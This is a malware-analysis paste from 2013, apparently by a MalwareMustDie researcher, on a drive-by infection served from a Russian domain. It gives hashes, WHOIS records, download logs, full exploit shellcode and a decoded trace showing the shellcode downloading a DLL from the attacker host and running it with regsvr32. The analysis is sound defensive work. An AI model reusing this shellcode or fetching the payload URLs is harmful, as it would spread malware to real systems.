Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #MalwareMustDie!
- #Case .ru:8080/*/column.php infection
- # Referer: http://pastebin.com/4WxSgjk7
- # Infector: gimikalno.ru at 66.249.23.64 , 94.102.14.239, 5.9.40.136
- # @unixfreaxjp ~]$ date
- # Tue Mar 12 02:44:53 JST 2013
- # payload malware binary snapshots I put:
- http://urlquery.net/report.php?id=1373504
- http://urlquery.net/report.php?id=1373509
- http://urlquery.net/report.php?id=1373512
- http://urlquery.net/report.php?id=1373517
- #Virus Total:
- URL: https://www.virustotal.com/en/file/b87c1be1dd90d9ae8e7b04c87a6ab0a2b706ded02e2f4c3db45db1bed9d46642/analysis/1363023004/
- SHA256: b87c1be1dd90d9ae8e7b04c87a6ab0a2b706ded02e2f4c3db45db1bed9d46642
- SHA1: 656ade98396bc2f671ad7344d179b791b2bece05
- MD5: 93a104caf7b01de69614498de5cf870a
- File size: 104.0 KB ( 106496 bytes )
- File name: info.exe
- File type: Win32 EXE
- Detection ratio: 2 / 45
- Analysis date: 2013-03-11 17:30:04 UTC ( 0 minutes ago )
- // DNS
- gimikalno・ru
- origin = ns1・gimikalno・ru
- mail addr = root・gimikalno・ru
- serial = 2012010101
- refresh = 604800
- retry = 1800
- expire = 1800
- minimum = 60
- domain: GIMIKALNO・RU
- nserver: ns1・gimikalno・ru・ 41・168・5・140
- nserver: ns2・gimikalno・ru・ 110・164・58・250
- nserver: ns3・gimikalno・ru・ 210・71・250・131
- nserver: ns4・gimikalno・ru・ 194・249・217・8
- nserver: ns5・gimikalno・ru・ 72・251・206・90
- state: REGISTERED, DELEGATED, UNVERIFIED
- person: Private Person
- registrar: NAUNET-REG-RIPN
- admin-contact: https://client・naunet・ru/c/whoiscontact
- created: 2013・03・03
- paid-till: 2014・03・03
- free-date: 2014・04・03
- source: TCI
- Last updated on 2013・03・11 20:56:36 MSK
- // landing page:
- --2013-03-12 02:16:24-- h00p://gimikalno・ru:8080/forum/links/column・php
- Resolving gimikalno・ru・・・ seconds 0・00, 5・9・40・136, 66・249・23・64, 94・102・14・239
- Caching gimikalno・ru => 5・9・40・136 66・249・23・64 94・102・14・239
- Connecting to gimikalno・ru|5・9・40・136|:8080・・・ seconds 0・00, connected・
- :
- GET /forum/links/column・php HTTP/1・0
- Referer: http://malwaremustdie・org-you-stupid-moronz
- Host: gimikalno・ru:8080
- HTTP request sent, awaiting response・・・
- :
- HTTP/1・1 200 OK
- Server: nginx/1・0・10
- Date: Mon, 11 Mar 2013 17:15:23 GMT
- Content-Type: text/html; charset=CP-1251
- Connection: close
- X-Powered-By: PHP/5・3・18-1~dotdeb・0
- Vary: Accept-Encoding
- 200 OK
- Length: unspecified [text/html]
- Saving to: `column・php'
- 2013-03-12 02:16:29 (50・1 KB/s) - `column・php' saved [156642]
- // shellcode:
- %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u0ce9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u414f%u4145%u4943%u4644%u0647%u5d5a%u1012%u1018%u0718%u474e%u5d5a%u0745%u4144%u4346%u075b%u474b%u5d44%u4645%u5806%u5840%u4017%u154e%u5f1a%u1912%u1244%u4419%u1a12%u125e%u4e19%u510e%u154d%u5e1a%u1912%u1243%u4519%u1b12%u121a%u1b1b%u1912%u1243%u4319%u1b12%u1219%u4219%u1912%u0e47%u155b%u4319%u5c0e%u154c%u0e5a%u4250%u4e15%u2828
- 41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81
- e9 0c fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff
- ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3
- 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04
- a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3
- af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3
- 5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4
- 85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b
- f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3
- 24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3
- 2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b
- 5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7
- d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28
- 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d
- d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab
- ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c
- 29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c
- 0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40
- d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28
- 5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21
- 28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28
- 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e
- 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3
- 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42
- d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2
- 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07
- 58 40 5c 5c 58 12 07 07 4f 41 45 41 43 49 44 46
- 47 06 5a 5d 12 10 18 10 18 07 4e 47 5a 5d 45 07
- 44 41 46 43 5b 07 4b 47 44 5d 45 46 06 58 40 58
- 17 40 4e 15 1a 5f 12 19 44 12 19 44 12 1a 5e 12
- 19 4e 0e 51 4d 15 1a 5e 12 19 43 12 19 45 12 1b
- 1a 12 1b 1b 12 19 43 12 19 43 12 1b 19 12 19 42
- 12 19 47 0e 5b 15 19 43 0e 5c 4c 15 5a 0e 50 42
- 15 4e 28 28
- // shellcode translate・・・
- 0x7c801ad9 kernel32・VirtualProtect(lpAddress=0x4020cf, dwSize=255)
- 0x7c801d7b kernel32・LoadLibraryA(lpFileName=urlmon)
- 0x7c835dfa kernel32・GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
- 0x1a494bbe urlmon・URLDownloadToFileA(pCaller=0, szURL=h00p://gimikalno・ru:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll)
- 0x7c86250d kernel32・WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
- 0x7c86250d kernel32・WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
- 0x7c81cb3b kernel32・TerminateThread(dwExitCode=0)
- // cracked payload download urls:
- h00p://gimikalno・ru:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f,
- h00p://66・249・23・64:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
- h00p://94・102・14・239:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
- h00p://5・9・40・136:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
- // payload download log:
- --2013-03-12 02:24:28-- h00p://gimikalno・ru:8080/forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
- Resolving gimikalno・ru・・・ seconds 0・00, 94・102・14・239, 5・9・40・136, 66・249・23・64
- Caching gimikalno・ru => 94・102・14・239 5・9・40・136 66・249・23・64
- Connecting to gimikalno・ru|94・102・14・239|:8080・・・ seconds 0・00, connected・
- :
- GET /forum/links/column・php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f HTTP/1・0
- Host: gimikalno・ru:8080
- HTTP request sent, awaiting response・・・
- :
- HTTP/1・1 200 OK
- Server: nginx/1・0・10
- Date: Mon, 11 Mar 2013 17:28:36 GMT
- Content-Type: application/x-msdownload
- Connection: keep-alive
- X-Powered-By: PHP/5・3・18-1~dotdeb・0
- Pragma: public
- Expires: Mon, 11 Mar 2013 17:24:21 GMT
- Cache-Control: must-revalidate, post-check=0, pre-check=0
- Cache-Control: private
- Content-Disposition: attachment; filename="info・exe"
- Content-Transfer-Encoding: binary
- Content-Length: 106496
- :
- 200 OK
- Registered socket 1892 for persistent reuse・
- Length: 106496 (104K) [application/x-msdownload]
- Saving to: `info・exe'
- 2013-03-12 02:24:31 (56・1 KB/s) - `info・exe' saved [106496/106496]
- ---
- #MalwareMustDie! @unixfreaxjp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement